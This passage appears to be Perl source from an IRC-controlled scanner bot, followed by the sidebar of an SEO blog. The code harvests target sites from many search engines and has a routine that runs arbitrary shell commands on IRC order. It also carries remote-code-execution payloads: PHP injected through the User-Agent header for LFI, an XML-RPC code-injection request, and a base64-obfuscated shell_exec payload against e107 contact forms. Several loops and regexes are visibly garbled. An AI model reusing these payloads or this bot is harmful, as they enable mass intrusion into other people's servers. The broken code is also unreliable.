my $search = ("http://www.gigablast.com".$hal);

my $res = &search_engine_query($search);

while ($res =~ m/Next 10 Results/) {

$search = ("http://www.gigablast.com".$hal);

while ($res =~ m/(.+?)>< \/span>/g) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

if ($res =~ m/
/) { $hal = $1; }

$res = &search_engine_query($search);

}return @list;

}sub black() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b< =50; $b+=1) {

my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);

my $cek = $b+1;

my $res = &search_engine_query($search);

if ($res !~ m/$b< \/strong>/i) {$b=50;}

while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /blekko/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub onet() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b< =50; $b+=1) {

my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /webcache|query/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub sizuka() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=10; $b my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /szukacz/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub walla() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/

 if ($1 !~ /walla\.co\.il/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub demos() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /search|dmoz/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub rose() {

my @list;

my $key = $_[0];

my $b = 0;

my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");

foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];

for ($b=0; $b my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /euroseek/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

}return @list;

}
sub seznam() {

my @list;

my $key = $_[0];

for ($b=1; $b my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /seznam/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub tiscali() {

my @list;

my $key = $_[0];

for ($b=0; $b my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /tiscali/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub naver() {

my @list;

my $key = $_[0];

for ($b=1; $b my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0〈=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=10");

my $res = &search_engine_query($search);

while ($res =~ m/new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;

print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";

my @pages = < $sock>;

$page = "@pages";

close($sock);

};

return $page;

}
#########################################
sub shell() {

my $path = $_[0];

my $cmd = $_[1];

if ($cmd =~ /cd (.*)/) {

chdir("$1") || &msg("$path","4,1No such file or directory");

return;

}

elsif ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

my @output = `$cmd 2>&1 3>&1`;

my $c = 0;

foreach my $output (@output) {

$c++;

chop $output;

&msg("$path","$output");

if ($c == 5) { $c = 0; sleep 2; }

}

exit;

}}

}
sub isAdmin() {

my $status = 0;

my $nick = $_[0];

if ($nick eq $admin) { $status = 1; }

return $status;

}
sub msg() {

return unless $#_ == 1;

sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");

}
sub nick() {

return unless $#_ == 0;

sendraw("NICK $_[0]");

}
sub notice() {

return unless $#_ == 1;

sendraw("NOTICE $_[0] :$_[1]");

}
sub cmdlfi() {

my $browser = LWP::UserAgent->new;

my $url = $_[0];

my $cmd = $_[1];

my $chan = $_[2];

my $hie = "j13mbut< ?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";

$browser->agent("$hie");

$browser->timeout(7);

$response = $browser->get( $url );

if ($response->content =~ /j13mbut(.*)j13mbut/s) {

&msg("$chan","15(4@9CMDLFI) $1");

} else {

&msg("$chan","15(4@9CMDLFI)4 No Output");

}

}
sub cmdxml() {

my $jed = $_[0];

my $dwa = $_[1];

my $chan = $_[2];

my $userAgent = LWP::UserAgent->new(agent => 'perl post');

$exploit = "< ?xml version=\"1.0\"?>";

$exploit .= "test.method";

$exploit .= "',''));";

$exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*";

my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);

if ($response->content =~ /bamby(.*)solo/s) {

&msg("$chan","15(4@9CMDXML) $1");

} else {

&msg("$chan","15(4@9CMDXML)4 No Output");

}

}
sub cmde107() { my $path = $_[0]; my $code = $_[1]; my $chan = $_[2]; my $codecmd = encode_base64($code); my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));'; my $req = HTTP::Request->new(POST => $path); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /plaNETWORK(.*)/ ){ $mydata = $1; &msg("$chan","15(4@9CMDe107) $mydata"); } else { &msg("$chan","15(4@9CMDe107)4 No Output"); } }
Posts by Mark Rushworth

2 Worthwhile Additions To Your Keyword Research Tool Kit

Stop SOPA – MR.SEO Going Dark

Apologies – Comments Now Working Again

Panda Update 19th December 2011

Christmas week is the time to get shit done!

Merry Christmas 2011

The SEO Team You Need!

Follow us

We Are Recruiting

Free SEO Audit Report

Top Posts

Categories

Archives

Mini Contacr
